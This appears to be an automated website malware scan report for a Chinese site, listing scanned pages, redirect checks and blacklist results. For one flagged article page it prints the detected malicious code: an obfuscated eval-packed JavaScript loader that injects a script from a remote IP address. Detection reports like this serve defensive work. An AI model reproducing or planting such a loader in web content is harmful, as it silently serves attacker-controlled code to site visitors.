Scanned pages/files
Request | Server response | Status |
http://shenzhen.kds100.com/ | 200 OK Content-Length: 71438 Content-Type: text/html | clean |
http://shenzhen.kds100.com/res/jquery-1.10.2.min.js | 200 OK Content-Length: 93111 Content-Type: application/x-javascript | clean |
http://www.kds100.com/res/js/FloatAd.js | 200 OK Content-Length: 2901 Content-Type: application/x-javascript | clean |
http://shenzhen.kds100.com/include/dedeajax2.js | 200 OK Content-Length: 7961 Content-Type: application/x-javascript | clean |
http://s20.cnzz.com/stat.php?id=3547652&web_id=3547652&show=pic | 200 OK Content-Length: 10075 Content-Type: application/javascript | clean |
http://shenzhen.kds100.com/js/serviceQQ.js | 200 OK Content-Length: 1505 Content-Type: application/x-javascript | clean |
http://shenzhen.kds100.com/map.html | 200 OK Content-Length: 7918 Content-Type: text/html | clean |
http://shenzhen.kds100.com/list/t_903.html | 200 OK Content-Length: 18149 Content-Type: text/html | clean |
http://shenzhen.kds100.com/list/t_904.html | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://shenzhen.kds100.com/test404page.js | 404 Not Found Content-Length: 2459 Content-Type: text/html | clean |
http://shenzhen.kds100.com/list/t_871.html | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://shenzhen.kds100.com/list/t_880.html | 200 OK Content-Length: 15819 Content-Type: text/html | clean |
http://shenzhen.kds100.com/list/t_883.html | 200 OK Content-Length: 17085 Content-Type: text/html | clean |
http://shenzhen.kds100.com/list/t_884.html | 200 OK Content-Length: 16015 Content-Type: text/html | clean |
http://shenzhen.kds100.com/a/fdfudaojianzhang/20131218/2270.html | 200 OK Content-Length: 18583 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('7 1=2.8("9");1.6="3://5.4.a.i:b/g/?h=f";2.e("c")[0].d(1);',19,19,'|s|document|http|28|115|src|var|createElement|script|238|8080|head|appendChild|getElementsByTagName|70|getq|jsuid|63'.split('|')))
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shenzhen.kds100.com
Result:
HTTP/1.1 200 OK
Date: Tue, 06 Jan 2015 15:21:29 GMT
Server: CISCO-IOS
Content-Length: 71438
Content-Type: text/html; charset=gb2312
X-Powered-By: WAF/2.0
X-Safe-Firewall: webscan.360.cn 1.0.5.4 F1W1
...71438 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: shenzhen.kds100.com
Referer: http://www.google.com/search?q=shenzhen.kds100.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shenzhen.kds100.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://shenzhen.kds100.com/
Result: shenzhen.kds100.com is not infected or malware details are not published yet.